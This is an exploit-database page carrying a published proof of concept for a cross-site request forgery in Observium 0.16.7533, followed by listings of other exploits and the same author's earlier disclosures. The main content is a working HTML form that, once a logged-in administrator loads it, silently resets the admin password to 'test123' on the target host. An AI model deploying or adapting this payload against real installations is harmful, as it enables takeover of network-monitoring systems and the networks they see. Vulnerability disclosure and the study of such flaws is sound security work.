Menu

Search for hundreds of thousands of exploits

"Observium 0.16.7533 - Cross-Site Request Forgery"

Author

Exploit author

"Dolev Farhi"

Platform

Exploit platform

php

Release date

Exploit published date

2016-04-29

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!--
# Exploit title: Observium Commercial - CSRF
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 28-04-2016
# Vendor homepage: http://observium.org/
# Software version: CE 0.16.7533

 
# Details:
Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more. Observium focuses on providing a beautiful and powerful yet simple and intuitive interface to the health and status of your network.

CSRF details
due to lack of csrf protection, it is possible to create an additional administrator user, or change the current administrator password since it does not ask for the previous password before changing it. 
i.e. New password <Enter new pass> & retype password <Enter new pass>
instead of having to insert the older password.
such an attack would look like this:
-->

<html>
<div align="center">
<pre>
 
<h2><b>Change admin password<b></h2>
<body>
<form
action="http://observiumIP/edituser/user_id=1/"
method="POST">
<input type="hidden" name="action" value="changepass" />
<input type="hidden" name="new_pass" value="test123" />
<input type="hidden" name="new_pass2" value="test123" />
<input type="submit" name="submit" value="save" />
    </form>
    </body>
</div>
</html>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-05-01 "VirtualTablet Server 3.0.2 - Denial of Service (PoC)" dos windows "Dolev Farhi"
2019-02-18 "M/Monit 3.7.2 - Privilege Escalation" webapps multiple "Dolev Farhi"
2018-06-18 "RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery (Add Admin)" webapps linux "Dolev Farhi"
2018-06-11 "userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting" webapps php "Dolev Farhi"
2018-06-11 "userSpice 4.3.24 - Username Enumeration" webapps php "Dolev Farhi"
2018-02-16 "UserSpice 4.3 - Blind SQL Injection" webapps php "Dolev Farhi"
2018-02-14 "userSpice 4.3 - Cross-Site Scripting" webapps php "Dolev Farhi"
2017-03-16 "Cobbler 2.8.0 - (Authenticated) Remote Code Execution" webapps linux "Dolev Farhi"
2016-08-04 "ntop-ng 2.5.160805 - Username Enumeration" webapps multiple "Dolev Farhi"
2016-04-29 "Observium 0.16.7533 - (Authenticated) Arbitrary Command Execution" webapps php "Dolev Farhi"
2016-04-29 "Observium 0.16.7533 - Cross-Site Request Forgery" webapps php "Dolev Farhi"
2015-12-01 "ntop-ng 2.0.151021 - Privilege Escalation" webapps multiple "Dolev Farhi"
2015-10-30 "Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution" webapps hardware "Dolev Farhi"
2015-06-12 "Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities" webapps multiple "Dolev Farhi"
2015-05-20 "ZOC SSH Client - Buffer Overflow (SEH) (PoC)" dos windows "Dolev Farhi"
2014-09-29 "OpenFiler 2.99.1 - Cross-Site Request Forgery" webapps php "Dolev Farhi"
2014-09-20 "M/Monit 3.3.2 - Cross-Site Request Forgery" webapps php "Dolev Farhi"
2014-09-02 "Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)" webapps multiple "Dolev Farhi"
2014-07-25 "Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting" webapps multiple "Dolev Farhi"
2014-07-23 "NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure" webapps hardware "Dolev Farhi"
2014-05-25 "User Cake - Cross-Site Request Forgery" webapps php "Dolev Farhi"
2014-05-24 "Mayan-EDms Web-Based Document Management OS System - Multiple Persistent Cross-Site Scripting Vulnerabilities" webapps multiple "Dolev Farhi"
2014-05-12 "SpiceWorks 7.2.00174 - Persistent Cross-Site Scripting" webapps windows "Dolev Farhi"
2014-05-08 "OpenFiler 2.99.1 - Arbitrary Code Execution" webapps hardware "Dolev Farhi"
2014-05-08 "Cobbler 2.4.x < 2.6.x - Local File Inclusion" webapps php "Dolev Farhi"
2014-05-08 "OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities" webapps hardware "Dolev Farhi"
2014-05-01 "NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting" webapps hardware "Dolev Farhi"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.